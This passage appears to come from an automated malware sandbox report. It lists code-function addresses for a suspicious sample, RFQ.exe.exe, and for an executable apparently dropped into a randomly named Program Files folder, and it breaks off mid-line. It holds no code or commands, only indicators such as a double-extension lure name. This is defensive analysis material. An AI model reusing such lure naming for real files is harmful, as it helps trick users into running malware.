          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C1C9F | 8_2_015C1C9F
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C2C9A | 8_2_015C2C9A
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B3490 | 8_2_015B3490
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C1746 | 8_2_015C1746
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C1FCE | 8_2_015C1FCE
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01515790 | 8_2_01515790
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B2782 | 8_2_015B2782
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01517640 | 8_2_01517640
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01525E70 | 8_2_01525E70
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01524E61 | 8_2_01524E61
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015BCE66 | 8_2_015BCE66
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01526611 | 8_2_01526611
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C26F8 | 8_2_015C26F8
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B3E96 | 8_2_015B3E96
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00401030 | 8_2_00401030
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00402D87 | 8_2_00402D87
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00402D90 | 8_2_00402D90
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00409F5C | 8_2_00409F5C
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00409F60 | 8_2_00409F60
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0041D71E | 8_2_0041D71E
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0041DF2B | 8_2_0041DF2B
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00402FB0 | 8_2_00402FB0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A6D9BE | 29_2_01A6D9BE
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C6180 | 29_2_019C6180
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A619E2 | 29_2_01A619E2
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A561DF | 29_2_01A561DF
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C7110 | 29_2_019C7110
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019E9906 | 29_2_019E9906
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C594B | 29_2_019C594B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A418B6 | 29_2_01A418B6
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019AA080 | 29_2_019AA080
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A628E8 | 29_2_01A628E8
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C48CB | 29_2_019C48CB
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C9810 | 29_2_019C9810
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A5D016 | 29_2_01A5D016
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019CE020 | 29_2_019CE020
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C0021 | 29_2_019C0021
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C1070 | 29_2_019C1070
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C4B96 | 29_2_019C4B96
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C63C2 | 29_2_019C63C2
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_0199EBE0 | 29_2_0199EBE0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019BFB40 | 29_2_019BFB40
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019B42B0 | 29_2_019B42B0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A61A99 | 29_2_01A61A99
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A622DD | 29_2_01A622DD
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C523D | 29_2_019C523D
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A50A02 | 29_2_01A50A02
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A6E214 | 29_2_01A6E214
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C4A5B | 29_2_019C4A5B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A5E581 | 29_2_01A5E581
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A3E58A | 29_2_01A3E58A
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A41DE3 | 29_2_01A41DE3
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A5D5D2 | 29_2_01A5D5D2
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A4FDDB | 29_2_01A4FDDB
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A3C53F | 29_2_01A3C53F
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019B1530 | 29_2_019B1530
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A51D1B | 29_2_01A51D1B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A62519 | 29_2_01A62519
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01990D40 | 29_2_01990D40
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A53490 | 29_2_01A53490
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A61C9F | 29_2_01A61C9F
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A62C9A | 29_2_01A62C9A
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A544EF | 29_2_01A544EF
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A5DCC5 | 29_2_01A5DCC5
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019B1410 | 29_2_019B1410
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A4F42B | 29_2_01A4F42B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019A740C | 29_2_019A740C
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C547E | 29_2_019C547E
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019B5790 | 29_2_019B5790
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A52782 | 29_2_01A52782
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A61FCE | 29_2_01A61FCE
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A61746 | 29_2_01A61746
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A53E96 | 29_2_01A53E96
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A626F8 | 29_2_01A626F8
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C6611 | 29_2_019C6611
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_01A5CE66 | 29_2_01A5CE66
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019B7640 | 29_2_019B7640
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019C5E70 | 29_2_019C5E70
          Source: C:\Program Files (x86)\W